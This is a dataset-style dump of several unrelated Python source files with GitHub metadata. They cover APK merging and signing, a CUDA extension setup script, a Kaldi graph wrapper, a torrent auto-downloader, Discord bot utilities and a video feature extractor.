break\n result.sort()\n return result, index_start, index_end\n\n\ndef parse_apktool_config(config_file_path):\n config_file_lines = list()\n with open(config_file_path, 'r') as file:\n config_file_lines = file.readlines()\n\n do_not_compress_lines, do_not_compress_index_start, do_not_compress_index_end = get_do_not_compress_lines(config_file_lines)\n\n properties = dict()\n properties['lines_all'] = config_file_lines\n properties['lines_do_not_compress'] = do_not_compress_lines\n properties['lines_do_not_compress_index_start'] = do_not_compress_index_start\n properties['lines_do_not_compress_index_end'] = do_not_compress_index_end\n\n return properties\n\n\ndef insert_new_lines_do_not_compress(config_file_path, lines_to_insert):\n file_apktool_config = parse_apktool_config(config_file_path)\n do_not_compress_lines_original = file_apktool_config['lines_do_not_compress']\n\n do_not_compress_lines_updated = set()\n do_not_compress_lines_updated.update(do_not_compress_lines_original)\n do_not_compress_lines_updated.update(lines_to_insert)\n do_not_compress_lines_updated = list(do_not_compress_lines_updated)\n do_not_compress_lines_updated.sort()\n\n config_file_lines_original = file_apktool_config['lines_all']\n config_file_lines_index_start = file_apktool_config['lines_do_not_compress_index_start']\n config_file_lines_index_end = file_apktool_config['lines_do_not_compress_index_end']\n config_file_lines_updated = list()\n for config_file_line in config_file_lines_original:\n config_file_lines_updated.append(config_file_line)\n config_file_lines_updated[config_file_lines_index_start:config_file_lines_index_end] = do_not_compress_lines_updated\n\n with open(config_file_path, 'w') as file:\n file.writelines(config_file_lines_updated)\n\n\ndef merge_dir_contents(path_src, path_dst):\n follow_symlinks_on_source_files = False\n replace_if_files_already_exist = False\n skip_file_io_errors = True\n\n file_names = os.listdir(path_src)\n if not os.path.isdir(path_dst):\n os.makedirs(path_dst)\n\n for file_name in file_names:\n file_src = os.path.join(path_src, file_name)\n file_dst = os.path.join(path_dst, file_name)\n try:\n if follow_symlinks_on_source_files and os.path.islink(file_src):\n symlink = os.readlink(file_src)\n os.symlink(symlink, file_dst)\n elif os.path.isdir(file_src):\n merge_dir_contents(file_src, file_dst)\n else:\n if not os.path.exists(file_dst) or replace_if_files_already_exist:\n # print(\"COPY %s TO %s\" % (file_src, file_dst))\n shutil.copy2(file_src, file_dst)\n except Exception as e:\n if not skip_file_io_errors:\n raise e\n try:\n shutil.copystat(path_src, path_dst)\n except Exception as e:\n if not skip_file_io_errors:\n raise e\n\n\ndef merge_apk_contents(dir_apk_main, dir_apk_secondary):\n directories_to_merge = ['assets', 'lib', 'res', 'unknown', 'kotlin']\n\n for dir_to_merge in directories_to_merge:\n path_src = os.path.join(dir_apk_secondary, dir_to_merge)\n path_dst = os.path.join(dir_apk_main, dir_to_merge)\n if os.path.exists(path_src) and os.path.isdir(path_src):\n merge_dir_contents(path_src, path_dst)\n\n path_file_config_src = os.path.join(dir_apk_secondary, const_apk_file_apktool_config)\n path_file_config_dst = os.path.join(dir_apk_main, const_apk_file_apktool_config)\n config_src = parse_apktool_config(path_file_config_src)\n insert_new_lines_do_not_compress(path_file_config_dst, config_src['lines_do_not_compress'])\n\n\ndef unpack_apk(path_dir_tmp, apk_file, number_current, number_total):\n print('[*] unpacking %d of %d' % (number_current, number_total))\n os.chdir(path_dir_tmp)\n rc = execute_command_subprocess(['apktool', 'd', '-s', apk_file])\n if rc != 0:\n raise Exception(\"failed to unpack %s\" % apk_file)\n os.remove(os.path.join(path_dir_tmp, apk_file))\n\n\ndef pack_apk(path_dir_tmp, main_apk_dir):\n print('[*] repack apk')\n os.chdir(path_dir_tmp)\n rc = execute_command_subprocess(['apktool', 'b', main_apk_dir])\n if rc != 0:\n raise Exception(\"failed to pack apk\")\n\n built_apk_file_path = os.path.join(path_dir_tmp, main_apk_dir, 'dist', '%s%s' % (os.path.basename(main_apk_dir), const_ext_apk))\n if not os.path.exists(built_apk_file_path):\n raise Exception(\"result apk not found\")\n\n build_apk_target_file = os.path.join(path_dir_tmp, '%s%s' % (const_file_target_file, const_ext_apk))\n if os.path.exists(build_apk_target_file):\n os.remove(build_apk_target_file)\n\n shutil.copy(built_apk_file_path, build_apk_target_file)\n\n\ndef zipalign_apk(path_dir_tmp):\n print('[*] zipalign apk')\n os.chdir(path_dir_tmp)\n\n built_apk_file_path = os.path.join(path_dir_tmp, const_file_target_file + const_ext_apk)\n if not os.path.exists(built_apk_file_path):\n raise Exception(\"result apk not found\")\n\n prefix_aligned = 'aligned_'\n built_apk_file_aligned_path = os.path.join(path_dir_tmp, prefix_aligned + const_file_target_file + const_ext_apk)\n if os.path.exists(built_apk_file_aligned_path):\n os.remove(built_apk_file_aligned_path)\n\n rc = execute_command_subprocess(['zipalign', '-p', '-f', '4', built_apk_file_path, built_apk_file_aligned_path])\n if rc != 0:\n raise Exception(\"failed to zipalign apk\")\n if not os.path.exists(built_apk_file_aligned_path):\n raise Exception(\"failed to zipalign apk\")\n\n os.remove(built_apk_file_path)\n shutil.move(built_apk_file_aligned_path, built_apk_file_path)\n\n\ndef sign_apk(path_dir_tmp, sign_config):\n build_apk_target_file = os.path.join(path_dir_tmp, '%s%s' % (const_file_target_file, const_ext_apk))\n if not os.path.exists(build_apk_target_file):\n raise Exception(\"result apk not found\")\n\n print('[*] resign apk')\n os.chdir(path_dir_tmp)\n rc = execute_command_subprocess(['apksigner', 'sign', '--ks', sign_config['sign.keystore.file'], '--ks-pass', 'pass:%s' % sign_config['sign.keystore.password'], '--ks-key-alias', sign_config['sign.key.alias'], '--key-pass', 'pass:%s' % sign_config['sign.key.password'], build_apk_target_file])\n if rc != 0:\n raise Exception(\"failed to sign apk file\")\n\n\ndef delete_file_if_exists(path_to_file):\n if os.path.exists(path_to_file):\n os.remove(path_to_file)\n\n\ndef delete_signature_related_files(path_to_main_apk):\n delete_file_if_exists(os.path.join(path_to_main_apk, 'original', 'META-INF', 'BNDLTOOL.RSA'))\n delete_file_if_exists(os.path.join(path_to_main_apk, 'original', 'META-INF', 'BNDLTOOL.SF'))\n delete_file_if_exists(os.path.join(path_to_main_apk, 'original', 'META-INF', 'MANIFEST.MF'))\n\n\ndef update_main_manifest_file(path_main_apk):\n path_manifest = os.path.join(path_main_apk, 'AndroidManifest.xml')\n data = None\n\n application_propertry_splits_required_from = ' android:isSplitRequired=\"true\" '\n application_propertry_splits_required_to = ' '\n metadata_google_play_splits_required_from = ''\n metadata_google_play_splits_required_to = ''\n metadata_google_play_splits_list_from = ''\n metadata_google_play_splits_list_to = ''\n metadata_google_play_stamp_type_from = 'android:value=\"STAMP_TYPE_DISTRIBUTION_APK\"'\n metadata_google_play_stamp_type_to = 'android:value=\"STAMP_TYPE_STANDALONE_APK\"'\n\n with open(path_manifest, 'r') as file:\n data = file.read()\n data = data.replace(application_propertry_splits_required_from, application_propertry_splits_required_to)\n data = data.replace(metadata_google_play_splits_required_from, metadata_google_play_splits_required_to)\n data = data.replace(metadata_google_play_splits_list_from, metadata_google_play_splits_list_to)\n data = data.replace(metadata_google_play_stamp_type_from, metadata_google_play_stamp_type_to)\n with open(path_manifest, 'w') as file:\n file.write(data)\n\n\ndef load_sign_properties():\n path_sign_config_file = os.path.abspath(os.path.join(os.getcwd(), const_sign_config_properties_file))\n if not os.path.exists(path_sign_config_file):\n path_sign_config_file = os.path.abspath(os.path.join(os.path.expanduser('~'), const_sign_config_properties_file))\n if not os.path.exists(path_sign_config_file):\n return None\n\n sign_config_file_lines = list()\n with open(path_sign_config_file, 'r') as sign_config_file:\n sign_config_file_lines = sign_config_file.readlines()\n\n properties = dict()\n for line in sign_config_file_lines:\n checked_line = line.strip().replace('\\r', '').replace('\\n', '')\n if checked_line is None or checked_line == '' or line.startswith('#'):\n continue\n line_parts = checked_line.split('=')\n if len(line_parts) != 2:\n continue\n property_key = line_parts[0].strip()\n property_value = line_parts[1].strip()\n properties[property_key] = property_value\n\n if not 'sign.enabled' in properties.keys() or properties['sign.enabled'].lower() != 'true':\n return None\n if 'sign.keystore.file' not in properties.keys() or 'sign.keystore.password' not in properties.keys() or 'sign.key.alias' not in properties.keys() or 'sign.key.password' not in properties.keys():\n return None\n keystore_file = properties['sign.keystore.file']\n if keystore_file == '' or not os.path.exists(keystore_file) or os.path.isdir(keystore_file):\n return None\n if properties['sign.keystore.password'] == '' or properties['sign.key.alias'] == '' or properties['sign.key.password'] == '':\n return None\n\n return properties\n\n\ndef build_single_apk(path_to_tmp_dir, path_to_main_apk_dir, should_sign_apk, sign_config):\n pack_apk(path_to_tmp_dir, path_to_main_apk_dir)\n zipalign_apk(path_to_tmp_dir)\n if should_sign_apk:\n sign_apk(path_to_tmp_dir, sign_config)\n\n\ndef copy_single_apk_to_working_dir(path_to_tmp_dir, path_to_working_dir, target_name):\n file_src = os.path.join(path_to_tmp_dir, const_file_target_file + const_ext_apk)\n if not os.path.exists(file_src) or os.path.isdir(file_src):\n raise Exception(\"result apk file not found\")\n\n file_dst = os.path.join(path_to_working_dir, target_name + const_ext_apk)\n if os.path.exists(file_dst):\n if os.path.isdir(file_dst):\n shutil.rmtree(file_dst)\n else:\n os.remove(file_dst)\n\n shutil.copy(file_src, file_dst)\n\n\ndef main():\n if not check_sys_args():\n print_help()\n exit(-1)\n\n tested_binary = \"apktool\"\n if not check_if_executable_exists_in_path(tested_binary):\n print(\"executable %s not found in $PATH, please install it before running mergeapks.py\" % tested_binary)\n exit(-2)\n\n tested_binary = \"zipalign\"\n if not check_if_executable_exists_in_path(tested_binary):\n print(\"executable %s not found in $PATH, please install it before running mergeapks.py\" % tested_binary)\n exit(-2)\n\n sign_properties = load_sign_properties()\n should_sign_apk = sign_properties is not None\n if should_sign_apk:\n tested_binary = \"apksigner\"\n if not check_if_executable_exists_in_path(tested_binary):\n print(\"executable %s not found in $PATH, please install it before running mergeapks.py\" % tested_binary)\n exit(-2)\n\n print('[*] start')\n\n cwd = os.path.abspath(os.path.curdir)\n path_dir_tmp = create_tmp_dir(cwd)\n apk_count = len(sys.argv) - 1\n apk_numbers_range = range(1, len(sys.argv))\n\n files_apk = list()\n files_apk_abs_paths = list()\n files_apk_original_names = list()\n paths_target_apk_files = list()\n paths_target_apk_dirs = list()\n for apk_number in apk_numbers_range:\n apk_file_name = get_param_apk_file_name(apk_number)\n original_file_name, original_file_extension = file_split_name_and_extension(apk_file_name)\n apk_file_abs_path = get_param_apk_abs_path(apk_number)\n files_apk.append(apk_file_name)\n files_apk_abs_paths.append(apk_file_abs_path)\n files_apk_original_names.append(original_file_name)\n target_apk_file_abs_path = os.path.join(path_dir_tmp, apk_file_name)\n target_apk_dir_abs_path = os.path.join(path_dir_tmp, original_file_name)\n paths_target_apk_files.append(target_apk_file_abs_path)\n paths_target_apk_dirs.append(target_apk_dir_abs_path)\n shutil.copy(apk_file_abs_path, target_apk_file_abs_path)\n\n for index, target_apk in enumerate(paths_target_apk_files):\n unpack_apk(path_dir_tmp, target_apk, index + 1, apk_count)\n\n path_apk_main = paths_target_apk_dirs[0]\n paths_apk_secondary = paths_target_apk_dirs[1:]\n\n for paths_apk_secondary in paths_apk_secondary:\n merge_apk_contents(path_apk_main, paths_apk_secondary)\n\n delete_signature_related_files(path_apk_main)\n update_main_manifest_file(path_apk_main)\n\n build_single_apk(path_dir_tmp, path_apk_main, should_sign_apk, sign_properties)\n copy_single_apk_to_working_dir(path_dir_tmp, cwd, const_file_result_file)\n\n shutil.rmtree(path_dir_tmp)\n\n print('[*] complete')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"LuigiVampa92/merge-apks","sub_path":"mergeapks.py","file_name":"mergeapks.py","file_ext":"py","file_size_in_byte":16663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7649997947","text":"import re\n\nimport os\nimport shutil\nimport inspect\n\nimport distutils\nimport distutils.spawn\nfrom distutils.command.clean import clean\n\nfrom setuptools import setup, Extension, find_packages\nfrom setuptools.command.install import install\n\nimport subprocess\nimport ctypes.util\n\nimport torch\n\n#Takes a path to walk\n#A function to decide if to keep\n#collection if we want a list of all occurances\ndef find(path, regex_func, collect=False):\n collection = [] if collect else None\n for root, dirs, files in os.walk(path):\n for file in files:\n if regex_func(file):\n if collect:\n collection.append(os.path.join(root, file))\n else:\n return os.path.join(root, file)\n return list(set(collection))\n\ndef findcuda():\n CUDA_HOME = os.getenv('CUDA_HOME', '/usr/local/cuda')\n if not os.path.exists(CUDA_HOME):\n # We use nvcc path on Linux and cudart path on macOS\n osname = platform.system()\n if osname == 'Linux':\n cuda_path = find_nvcc()\n else:\n cudart_path = ctypes.util.find_library('cudart')\n if cudart_path is not None:\n cuda_path = os.path.dirname(cudart_path)\n else:\n cuda_path = None\n if cuda_path is not None:\n CUDA_HOME = os.path.dirname(cuda_path)\n else:\n CUDA_HOME = None\n WITH_CUDA = CUDA_HOME is not None\n return CUDA_HOME\n\n\n\n#Get some important paths\n# curdir = os.path.dirname(os.path.abspath(inspect.stack()[0][1]))\ncurdir = os.path.join(os.path.dirname(os.path.realpath(__file__)),\n 'apex_utils')\nos.chdir(curdir)\n\nbuildir = curdir+os.sep+\"build\"\nif not os.path.exists(buildir):\n os.makedirs(buildir)\n\ntorch_dir = os.path.split(torch.__file__)[0] + os.sep + \"lib\"\n\ncuda_files = find(curdir, lambda file: file.endswith(\".cu\"), True)\ncuda_headers = find(curdir, lambda file: file.endswith(\".cuh\"), True)\nheaders = find(curdir, lambda file: file.endswith(\".h\"), True)\n\nlibaten = find(torch_dir, re.compile(\"libaten\", re.IGNORECASE).search, False)\naten_h = find(torch_dir, re.compile(\"aten.h\", re.IGNORECASE).search, False)\n\ninclude_dirs = [os.path.dirname(os.path.dirname(aten_h))]\nlibrary_dirs = []\nfor file in cuda_headers+headers:\n dir = os.path.dirname(file)\n if dir not in include_dirs:\n include_dirs.append(dir)\n\nassert libaten, \"Could not find PyTorch's libATen.\"\nassert aten_h, \"Could not find PyTorch's ATen header.\"\n\nlibrary_dirs.append(os.path.dirname(libaten))\n\n#create some places to collect important things\nobject_files = []\nextra_link_args=[]\nmain_libraries = []\nmain_libraries += ['cudart', 'cuda', 'ATen']\nextra_compile_args = [\"--std=c++11\",]\n\n#findcuda returns root dir of CUDA\n#include cuda/include and cuda/lib64 for python module build.\nCUDA_HOME=findcuda()\nlibrary_dirs.append(os.path.join(CUDA_HOME, \"lib64\"))\ninclude_dirs.append(os.path.join(CUDA_HOME, 'include'))\n\nclass RMBuild(clean):\n def run(self):\n #BE VERY CAUTIOUS WHEN USING RMTREE!!!\n #These are some carefully written/crafted directories\n if os.path.exists(buildir):\n shutil.rmtree(buildir)\n \n distdir = curdir+os.sep+\"dist\"\n if os.path.exists(distdir):\n shutil.rmtree(distdir)\n\n eggdir = curdir+os.sep+\"apex.egg-info\"\n if os.path.exists(eggdir):\n shutil.rmtree(eggdir)\n clean.run(self)\n\ndef CompileCudaFiles():\n\n print()\n print(\"Compiling cuda modules with nvcc:\")\n #Need arches to compile for.\n nvcc_cmd = ['nvcc', \n '-Xcompiler', \n '-fPIC',\n '-gencode', 'arch=compute_52,code=sm_52',\n '-gencode', 'arch=compute_60,code=sm_60',\n '-gencode', 'arch=compute_61,code=sm_61',\n '-gencode', 'arch=compute_70,code=sm_70',\n '-gencode', 'arch=compute_70,code=compute_70',\n '--std=c++11',\n '-O3',\n ]\n \n for dir in include_dirs:\n nvcc_cmd.append(\"-I\"+dir)\n\n for file in cuda_files:\n object_name = os.path.basename(\n os.path.splitext(file)[0]+\".o\"\n )\n \n object_file = os.path.join(buildir, object_name)\n object_files.append(object_file)\n \n file_opts = ['-c', file, '-o', object_file]\n \n print(' '.join(nvcc_cmd+file_opts))\n subprocess.check_call(nvcc_cmd+file_opts)\n \n for object_file in object_files:\n extra_link_args.append(object_file)\n\n#print()\n#print(\"Arguments used to build CUDA extension:\")\n#print(\"extra_compile_args :\", extra_compile_args)\n#print(\"include_dirs: \", include_dirs)\n#print(\"extra_link_args: \", extra_link_args)\n#print(\"library_dirs: \", library_dirs)\n#print(\"libraries: \", main_libraries)\n#print()\n#CompileCudaFiles()\n\n#print(\"Building CUDA extension.\")\n#cuda_ext = Extension('apex._C',\n# [os.path.join('csrc', 'Module.cpp')],\n# extra_compile_args = extra_compile_args,\n# include_dirs=include_dirs,\n# extra_link_args=extra_link_args,\n# library_dirs=library_dirs,\n# runtime_library_dirs = library_dirs,\n# libraries=main_libraries\n# )\n\nprint(\"Building module.\")\nsetup(\n name='apex', version='0.1',\n cmdclass={\n 'clean' : RMBuild,\n }, \n# ext_modules=[cuda_ext,],\n description='PyTorch Extensions written by NVIDIA',\n packages=find_packages(where='.',\n exclude=(\"build\", \"csrc\", \"include\", \"tests\")),\n install_requires=[\n \"numpy\",\n \"pandas\",\n \"scikit-learn\",\n \"matplotlib\",\n \"unidecode\",\n ]\n)\n","repo_name":"AnastasiiaNovikova/sentiment-discovery","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":5855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"19376835055","text":"import os\nimport abkhazia.utils as utils\nimport abkhazia.kaldi as kaldi\n\n\ndef options():\n \"\"\"Return default parameters for the mkgraph script\"\"\"\n opt = kaldi.options.make_option\n\n return {k: v for k, v in (\n opt('transition-scale', default=1.0, type=float,\n help='Transition-probability scale'),\n opt('self-loop-scale', default=0.1, type=float,\n help='Scale of self-loop versus non-self-loop log probs'),\n opt('reverse', default=False, type=bool,\n help='Build a time-reversed H transducer'))}\n\n\ndef mkgraph(decoder, verbose=True):\n decoder.log.info('computing full decoding graph')\n\n opts = decoder.mkgraph_opts\n\n target = os.path.join(decoder.recipe_dir, 'graph')\n if not os.path.isdir(target):\n os.makedirs(target)\n\n command = (\n '{cmd} {log} utils/mkgraph.sh {mono} {reverse} '\n '--transition-scale {tscale} --self-loop-scale {slscale} '\n '{lang} {model} {graph}'.format(\n cmd=os.path.join(\n 'utils', utils.config.get('kaldi', 'highmem-cmd')),\n log=os.path.join(target, 'mkgraph.log'),\n mono='--mono' if decoder.am_type == 'mono' else '',\n reverse='--reverse' if opts['reverse'].value else '',\n tscale=str(opts['transition-scale']),\n slscale=str(opts['self-loop-scale']),\n lang=decoder.lm_dir,\n model=decoder.am_dir,\n graph=target))\n\n decoder._run_command(command, verbose=verbose)\n\n return target\n","repo_name":"bootphon/abkhazia","sub_path":"abkhazia/decode/_mkgraph.py","file_name":"_mkgraph.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"48"} +{"seq_id":"36181622825","text":"import os\nimport re\nimport platform\nimport threading\nimport time\nimport datetime\nimport rarbgapi\nimport pprint\nimport json\nfrom clutch import core\nfrom PTN.parse import PTN\n\ndef read_json(file_path=\"\"):\n\n if file_path and os.path.exists(file_path):\n with open(file_path, \"r\") as file_:\n return json.loads(file_.read())\n return {}\n\nCONFIG = read_json(\"config.json\")\nCACHE_FILE = \".downloaded\"\n\ndef get_csv_rows(file_path=\"\", delimiter=\",\"):\n lst_result = []\n\n if file_path and os.path.exists(file_path):\n with open(file_path, \"r\") as file_:\n dict_index = {}\n for line_ in file_.readlines():\n line_ = f\"{line_}\".strip(\"\\n\").strip(\"\\l\").strip(\"\\r\")\n\n if line_:\n lst_line_split = f\"{line_}\".split(delimiter)\n if not dict_index:\n for i in range(len(lst_line_split)):\n dict_index[i] = lst_line_split[i]\n else:\n dict_data = {}\n for i in range(len(lst_line_split)):\n dict_data[dict_index[i]] = lst_line_split[i]\n\n if dict_data:\n lst_result.append(dict_data)\n\n return lst_result\n\n\ndef get_download_dir(search_name=\"\", relative_dir=\"\", *args, **kwargs):\n\n result = \"\"\n\n if search_name:\n lst_search_name_split = re.split(\"[._ ]+\", str(search_name).lower())\n\n share_drive_dir = \"\"\n if platform.system() == \"Windows\":\n share_drive_dir = CONFIG[\"share_drive\"][\"win_path\"]\n else:\n share_drive_dir = CONFIG[\"share_drive\"][\"linux_path\"]\n\n\n if share_drive_dir and os.path.exists(share_drive_dir):\n\n download_dir = os.path.join(share_drive_dir, relative_dir)\n download_dir = os.path.abspath(download_dir)\n\n for parent_dir_, dirs_, files_ in os.walk(download_dir):\n this_dir = parent_dir_\n found = False\n for dir_ in dirs_:\n lst_dir_split = re.split(\"[._ ]+\", str(dir_).lower())\n lst_inter = list(set(lst_search_name_split) & set(lst_dir_split))\n if lst_inter and len(lst_inter) == len(lst_search_name_split):\n found = True\n this_dir = os.path.join(parent_dir_, dir_)\n break\n\n if found:\n result = this_dir\n\n if not result:\n folder_name = \".\".join([str(part).title() for part in lst_search_name_split])\n result = os.path.join(download_dir, folder_name)\n if not os.path.exists(result):\n # os.mkdir(result)\n print (\"Created: {0}\".format(result))\n\n return result\n\ndef get_shared_items(d1={}, d2={}):\n return {k: d1[k] for k in d1 if k in d2 and d1[k] == d2[k]}\n\ndef get_torrents(search_string=\"\", download_dir=\"\", converter_name=\"\", *args, **kwargs):\n\n dict_torrents = {}\n\n # RarBg\n rarbg_client = rarbgapi.RarbgAPI()\n\n search_string_parser = PTN()\n dict_search_string_values = search_string_parser.parse(search_string)\n\n # category = [rarbg_client.CATEGORY_TV_EPISODES_UHD, rarbg_client.CATEGORY_TV_EPISODES_HD, rarbg_client.CATEGORY_TV_EPISODES]\n torrent_parser = PTN()\n\n dict_group_torrents = {}\n\n # Group torrents by season, episode\n lst_torrent = rarbg_client.search(search_string=search_string, limit=100)\n if lst_torrent:\n for torrent_ in sorted(lst_torrent, key=lambda item: item.filename):\n\n dict_torrent_values = torrent_parser.parse(name=torrent_.filename)\n shared_items = get_shared_items(dict_search_string_values, dict_torrent_values)\n dict_torrent_values.update(torrent_._raw)\n\n state_keys = len(shared_items) == len(dict_search_string_values)\n state_name = str(torrent_.filename).lower().startswith(search_string.lower().replace(\" \", \".\"))\n\n if not (state_keys or state_name and \"resolution\" in dict_torrent_values):\n continue\n\n dict_torrent_values[\"download_dir\"] = download_dir\n\n is_combined = False\n key = None\n if \"tv\" in dict_torrent_values[\"category\"].lower():\n key = (dict_torrent_values['title'], \"tv\")\n is_combined = True\n elif 'season' in dict_torrent_values and 'episode' in dict_torrent_values:\n key = (dict_torrent_values['title'], dict_torrent_values['season'], dict_torrent_values['episode'])\n elif \"movies\" in \"{0}\".format(dict_torrent_values[\"category\"].lower()).split(\"/\"):\n key = (dict_torrent_values['title'], \"movies\")\n is_combined = True\n\n if key:\n dict_torrent_values[\"key_name\"] = key\n\n if key not in dict_group_torrents:\n dict_group_torrents[key] = []\n dict_group_torrents[key].append(dict_torrent_values)\n\n if is_combined:\n break\n\n\n # Get the best resolution and converter name by every key (season, episode)\n for key_name_, lst_data_ in dict_group_torrents.items():\n lst_data_.sort(key=lambda item: item[\"resolution\"] if \"resolution\" in item else item[\"filename\"])\n\n dict_torrent = lst_data_[0]\n\n if converter_name:\n for dict_torrent_ in lst_data_:\n\n converter_name_value_ = None\n if \"excess\" in dict_torrent_:\n converter_name_value_ = dict_torrent_[\"excess\"]\n\n if \"group\" in dict_torrent_:\n converter_name_value_ = dict_torrent_[\"group\"]\n\n if isinstance(converter_name_value_, str):\n converter_name_value_ = [converter_name_value_]\n\n found = False\n for conv_name_value_ in converter_name_value_:\n if str(conv_name_value_).endswith(converter_name):\n found = True\n break\n if found:\n dict_torrent = dict_torrent_\n break\n\n dict_torrents[key_name_] = dict_torrent\n\n return dict_torrents\n\ndef add_torrents(tc_client=None, lst_torrent=[]):\n\n if tc_client and lst_torrent:\n print(\"Add into torrent transmitter...\")\n\n # Add into torrent transmission\n rbr = 0\n for dict_torrent_ in lst_torrent:\n # priority\n dict_data = {}\n dict_data[\"filename\"] = dict_torrent_[\"download\"]\n dict_data[\"download-dir\"] = dict_torrent_[\"download_dir\"]\n dict_data['priority'] = \"low\"\n if rbr <= 2:\n dict_data['priority'] = \"high\"\n elif rbr <= 4:\n dict_data['priority'] = \"normal\"\n\n print (f\"Add {dict_data}\")\n # tc_client.torrent.add(**dict_data)\n\n rbr += 1\n\ndef auto_download():\n\n\n tc_client = core.Client(address=CONFIG[\"url\"], username='admin', password='openmediavault')\n dt_end = datetime.datetime.now()\n\n while True:\n\n if datetime.datetime.now() >= dt_end:\n\n lst_all_downloaded = []\n if os.path.exists(CACHE_FILE):\n with open(CACHE_FILE, \"r\") as file_:\n lst_all_downloaded = [tuple(item_) for item_ in json.loads(file_.read())]\n\n for dict_data_ in get_csv_rows(\"input.csv\"):\n\n download_dir = get_download_dir(**dict_data_)\n\n converter_name = dict_data_[\"converter_name\"] if \"converter_name\" in dict_data_ else \"\"\n\n dict_torrents = get_torrents(search_string=dict_data_[\"search_name\"], download_dir=download_dir, converter_name=converter_name)\n\n lst_diff = list(set(dict_torrents.keys()) - set(lst_all_downloaded))\n\n add_torrents(tc_client=tc_client, lst_torrent=[dict_torrents[key] for key in lst_diff])\n lst_all_downloaded += lst_diff\n\n with open(CACHE_FILE, \"w+\", encoding='utf-8') as file_:\n json.dump(lst_all_downloaded, file_, ensure_ascii=False, indent=4)\n\n dt_end += datetime.timedelta(minutes=15)\n else:\n print (f\"Next round: {dt_end}\")\n\n time.sleep(25)\n\n\ndef main():\n\n thread_auto_dl = threading.Thread(target=auto_download)\n thread_auto_dl.start()\n\nif __name__ == '__main__':\n main()","repo_name":"softwaresky/AutoDownloadTorrents","sub_path":"DownloadTorrent.py","file_name":"DownloadTorrent.py","file_ext":"py","file_size_in_byte":8505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28397602104","text":"import datetime\r\nfrom discord.utils import get\r\n\r\n\r\ndef get_time():\r\n now = datetime.datetime.now()\r\n hours = str(now.hour)\r\n if len(hours) == 1:\r\n hours = '0' + hours\r\n minutes = str(now.minute)\r\n if len(minutes) == 1:\r\n minutes = '0' + minutes\r\n seconds = str(now.second)\r\n if len(seconds) == 1:\r\n seconds = '0' + seconds\r\n day = str(now.day)\r\n if len(day) == 1:\r\n day = '0' + day\r\n month = str(now.month)\r\n if len(month) == 1:\r\n month = '0' + month\r\n year = str(now.year)\r\n clock = '[{0}.{1}.{2} {3}:{4}:{5}]'.format(day, month, year, hours, minutes, seconds)\r\n return clock\r\n\r\n\r\ndef catch_role(message, rolename):\r\n member = message.author\r\n catchedrole = get(member.guild.roles, name=rolename)\r\n return catchedrole\r\n\r\n\r\ndef catch_channel(message, channelid):\r\n member = message.author\r\n catchedchannel = get(member.guild.channels, id=channelid)\r\n return catchedchannel\r\n","repo_name":"Luk3Pl4ys/Discord-Bot","sub_path":"Functions/other.py","file_name":"other.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35941430184","text":"import csv\r\nimport glob\r\nimport os\r\nimport pathlib\r\nfrom subprocess import call\r\nfrom itertools import chain\r\nfrom extractor import Extractor\r\nfrom tqdm import tqdm\r\nimport numpy as np\r\nimport random\r\n\r\n\r\nclass VideoFeatureExtractor():\r\n def __init__(self, video_root_dir, database_name, seq_length, model_dir):\r\n self.dir_path = os.path.dirname(os.path.realpath(__file__))\r\n pathlib.Path(os.path.join(self.dir_path, 'data', database_name)).mkdir(\r\n parents=True, exist_ok=True)\r\n pathlib.Path(os.path.join(self.dir_path, 'data', 'sequences')).mkdir(\r\n parents=True, exist_ok=True)\r\n self.root_dir = video_root_dir\r\n self.database = database_name\r\n self.seq_length = seq_length\r\n self.data_path = self.dir_path + '\\\\data'\r\n self.model_dir = model_dir\r\n self.dataset_infro = []\r\n self.extract_files\r\n self.extract_features\r\n\r\n @ property\r\n def extract_files(self):\r\n classes_videos_folders = glob.glob(self.root_dir + '\\\\' + '*')\r\n self.classes = self.get_classes(classes_videos_folders)\r\n for class_videos in classes_videos_folders:\r\n videos_per_class = glob.glob(class_videos + '\\\\*.avi')\r\n\r\n for video_path in videos_per_class:\r\n video_information = self.get_video_parts(video_path)\r\n databasename, classname, filename_no_ext, filename, \\\r\n _ = video_information\r\n pathlib.Path(os.path.join(self.data_path, databasename,\r\n classname)).mkdir(parents=True, exist_ok=True)\r\n if not self.check_already_extracted(video_information):\r\n src = self.root_dir + '\\\\' + classname + '\\\\' + \\\r\n \t\t filename\r\n\r\n dest = self.data_path + '\\\\' + databasename + '\\\\' + \\\r\n classname + '\\\\' + filename_no_ext + '-%04d.jpg'\r\n call([\"ffmpeg\", \"-i\", src, dest])\r\n\r\n # Now get how many frames it is.\r\n nb_frames = self.get_nb_frames_for_video(video_information)\r\n self.dataset_infro.append([classname,\r\n filename_no_ext,\r\n nb_frames,\r\n self.get_class_index(classname)])\r\n random.shuffle(self.dataset_infro)\r\n with open(os.path.join(self.data_path,self.database +'.csv'),\r\n 'w', newline='') as fout:\r\n writer = csv.writer(fout)\r\n writer.writerows(self.dataset_infro)\r\n\r\n def get_classes(self, classes_video_folders):\r\n classes = []\r\n for item in classes_video_folders:\r\n classes.append(item.split('\\\\')[-1])\r\n classes = sorted(classes)\r\n return classes\r\n\r\n def get_class_index(self, class_str):\r\n return self.classes.index(class_str)\r\n\r\n\r\n @ property\r\n def extract_features(self):\r\n # build model for feature extraction\r\n feature_extractor = Extractor(self.model_dir)\r\n # Loop through data.\r\n pbar = tqdm(total=len(self.dataset_infro))\r\n for each_video in self.dataset_infro:\r\n print(each_video)\r\n path = self.data_path + '\\\\sequences\\\\' + each_video[1] + \\\r\n '-' + str(self.seq_length) + '-features.txt'\r\n\r\n if os.path.isfile(path):\r\n pbar.update(1)\r\n continue\r\n\r\n frames = self.get_frames_for_sample(each_video)\r\n frames = self.rescale_list(frames, self.seq_length)\r\n\r\n # Now loop through and extract features to build the sequence\r\n sequence = []\r\n for image in frames:\r\n features = feature_extractor.inception(image)\r\n sequence.append(features)\r\n npsquence = np.array(sequence)\r\n\r\n # save the sequence\r\n 